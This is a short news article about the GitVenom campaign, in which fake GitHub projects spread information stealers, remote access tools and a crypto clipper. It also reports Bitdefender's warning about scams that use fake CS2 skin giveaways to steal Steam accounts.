GitVenom Malware Hijacks Wallets via Fake GitHub Projects, Stealing $456K in Bitcoin

26.02.2025

Cybersecurity experts have uncovered an ongoing campaign targeting gamers and cryptocurrency investors through fake open-source projects on GitHub. Dubbed GitVenom by Kaspersky, the operation involves hundreds of repositories designed to deceive users into downloading malicious software. These fraudulent projects include an Instagram automation tool, a Telegram bot for managing Bitcoin wallets, and a Valorant game crack—all of which are completely fake. Instead of providing their advertised functionality, these projects steal personal and financial data while hijacking cryptocurrency wallets.

The attack has reportedly led to the theft of 5 bitcoins (approximately $456,600), with evidence suggesting that the campaign has been active for at least two years. Most recorded infections have been in Russia, Brazil, and Turkey. The malicious repositories use various programming languages, such as Python, JavaScript, C, C++, and C#. However, their core function remains the same: deploying an embedded malicious payload that downloads additional harmful components from an attacker-controlled GitHub repository.

One of the primary threats in this campaign is a Node.js-based information stealer that gathers sensitive data, including passwords, banking details, stored credentials, cryptocurrency wallet information, and browsing history. This stolen data is compressed into a .7z archive and transmitted to attackers via Telegram. Additionally, the malware installs remote administration tools like AsyncRAT and Quasar RAT, allowing cybercriminals to take control of infected devices. A clipper malware is also deployed to replace copied cryptocurrency wallet addresses with those belonging to the attackers, effectively redirecting digital assets.

Given the widespread use of GitHub among developers worldwide, cybersecurity researchers warn that such malicious campaigns are likely to persist. Kaspersky emphasizes the importance of thoroughly vetting third-party code before executing or integrating it into any project. Developers and users are urged to scrutinize software sources and verify their authenticity to minimize the risk of infection.

Meanwhile, Bitdefender has uncovered another cybersecurity threat targeting gamers. Scammers are exploiting major e-sports tournaments like IEM Katowice 2025 and PGL Cluj-Napoca 2025 to defraud Counter-Strike 2 (CS2) players. By hijacking YouTube accounts and impersonating professional gamers such as s1mple, NiKo, and donk, cybercriminals lure victims into fake CS2 skin giveaways, ultimately leading to stolen Steam accounts, cryptocurrency theft, and the loss of valuable in-game items.